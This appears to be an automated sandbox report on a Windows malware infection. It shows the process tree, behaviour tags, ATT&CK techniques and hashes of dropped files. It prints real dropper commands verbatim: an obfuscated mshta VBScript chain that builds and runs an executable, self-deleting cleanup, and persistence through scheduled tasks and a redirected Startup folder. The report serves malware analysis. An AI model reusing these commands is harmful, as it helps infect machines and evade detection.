C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1688 /prefetch:26⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=3660 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=2036 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=1644 /prefetch:86⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=3600 /prefetch:86⤵
-
C:\Windows\SysWOW64\NETSTAT.EXE"C:\Windows\SysWOW64\NETSTAT.EXE"2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\fB2o7Rk0HXlk55eGAPCDGiLL.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\E4A5.exeC:\Users\Admin\AppData\Local\Temp\E4A5.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E4A5.exeC:\Users\Admin\AppData\Local\Temp\E4A5.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\701D.exeC:\Users\Admin\AppData\Local\Temp\701D.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\756E.exeC:\Users\Admin\AppData\Local\Temp\756E.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\9C7F.exeC:\Users\Admin\AppData\Local\Temp\9C7F.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9C7F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9C7F.exe" & del C:\ProgramData\*.dll & exit3⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9C7F.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\A8A5.exeC:\Users\Admin\AppData\Local\Temp\A8A5.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\D7C5.exeC:\Users\Admin\AppData\Local\Temp\D7C5.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\DE0F.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\FC75.exeC:\Users\Admin\AppData\Local\Temp\FC75.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\CC0B.exeC:\Users\Admin\AppData\Local\Temp\CC0B.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\CC0B.exeC:\Users\Admin\AppData\Local\Temp\CC0B.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\405ec8a3-7c77-4c6b-8b59-22beea8a0ce2" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\CC0B.exe"C:\Users\Admin\AppData\Local\Temp\CC0B.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\CC0B.exe"C:\Users\Admin\AppData\Local\Temp\CC0B.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build2.exe"C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build2.exe"C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build2.exe"7⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build3.exe"C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build3.exe"C:\Users\Admin\AppData\Local\f3de4f04-32c6-4447-91dc-feabd7b62fce\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\CF96.exeC:\Users\Admin\AppData\Local\Temp\CF96.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im CF96.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CF96.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im CF96.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\D1E9.exeC:\Users\Admin\AppData\Local\Temp\D1E9.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\D5B3.exeC:\Users\Admin\AppData\Local\Temp\D5B3.exe2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE ( CReateobjECT( "WscRipT.SHeLl" ). rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\D5B3.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\D5B3.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 , TrUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\D5B3.exe" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd& iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\D5B3.exe" ) do taskkill /iM "%~nXN" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXEMXB89oH1.eXE /poMZbeSahrmSD~4GRjd5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE ( CReateobjECT( "WscRipT.SHeLl" ). rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 , TrUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd& iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" ) do taskkill /iM "%~nXN" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ( "wscRiPt.shElL" ). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP + P1JSBZHT.GQ + KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ " , 0, TRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL+ G2K6.CP + P1JSBZHT.GQ + KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\YFYnG.AJ8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "D5B3.exe" -f5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\DC3C.exeC:\Users\Admin\AppData\Local\Temp\DC3C.exe2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\DE0F.dll"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵
-
C:\Users\Admin\AppData\Roaming\twtasiaC:\Users\Admin\AppData\Roaming\twtasia2⤵
-
C:\Users\Admin\AppData\Roaming\rgtasiaC:\Users\Admin\AppData\Roaming\rgtasia2⤵
-
C:\Users\Admin\AppData\Roaming\hetasiaC:\Users\Admin\AppData\Roaming\hetasia2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BF73FBE548E629DF8250DBF5166C4ACB C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 76EDD54DA4B507F46799177BE0E088F02⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SendNotifyMessage
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3E5CD3DC3AFD9D842881D49723F11FE5 E Global\MSI00002⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exeMD5
07e143efd03815a3b8c8b90e7e5776f0
SHA1077314efef70cef8f43eeba7f1b8ba0e5e5dedc9
SHA25632967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149
SHA51279ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exeMD5
07e143efd03815a3b8c8b90e7e5776f0
SHA1077314efef70cef8f43eeba7f1b8ba0e5e5dedc9
SHA25632967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149
SHA51279ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exeMD5
77294635b863561ecd6267711c5222a2
SHA170895878eefac9540bb885c29d125b88f56fa745
SHA256b1dd835c2d5caae422469d55c05823f95f649829db8ed2dddc3a4f3e5a228b28
SHA5128237e9369553a534d30f996037d6c5aec5d5efcab0a01a40f667fb7f89aa05bcefb3b85c074023f488ac517c5c2c66f76fa4a5573d0e6f142db59078e5c11757
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exeMD5
77294635b863561ecd6267711c5222a2
SHA170895878eefac9540bb885c29d125b88f56fa745
SHA256b1dd835c2d5caae422469d55c05823f95f649829db8ed2dddc3a4f3e5a228b28
SHA5128237e9369553a534d30f996037d6c5aec5d5efcab0a01a40f667fb7f89aa05bcefb3b85c074023f488ac517c5c2c66f76fa4a5573d0e6f142db59078e5c11757
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
965b86d9cfd73745a0e7801b70cdc803
SHA1bba4645ddb00a1971069b7213a884aa218157a98
SHA25631b02cdc4b6c4a687f5ed077db58edaec48b1dd4424a81e89c155a3b7ecff8bd
SHA512e7bdcc10bb05b2ca1dcb4f2fd40f29f8fb74485295c33f4aebb94ec98359122fc990b16449d7d6b3fcb7dbbb82afcb79a682cd12d7d0c799d4de4ceb42b6cc7f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
d4436269dc5dcf6b4e0e091fcf139e46
SHA1e6d6030bfc5acc8e7b5e4f31f80cc2c9a7db72a0
SHA25613b16de129d644f7067d000dd83f2be2c7230fc4c2f55d2d4859c4d2ea2bcd43
SHA512e8ae9aa9f63ee268c4febb0d50413f4d65e61893a9375c94861c2c2e1dd768922cf0843b9bba5402d90b3398759d1bbea30dec2aea00e1b39a5200cf8be25673
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\DBA8.batMD5
14496e35d65b8ea8c5ae9682778224f5
SHA1effd1b063bd800a66f33f1b49e424876b0740695
SHA256f9370d07bdb882b82d4b0326406847c6590c9b5b9bf4876ce8108a2d84b49cb8
SHA5125829a008fb42028a7608d85140771da7d79d068db63f50db7c07fa5fea07bc77e1d731a73fb937d3b096649cdf3a58f925a8da8716a8da1e4f8e880e4f8428bd
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\DBA6.tmp\DBA7.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Allora.wmvMD5
462980ddb945823936b32de3c25b1d68
SHA1c8e81bcaa49f9d1e0c7da810eb16f6089bc5d601
SHA256180f8641cce53be0ec434d2ccd812c608832b60032d253be23bd4b88849110b5
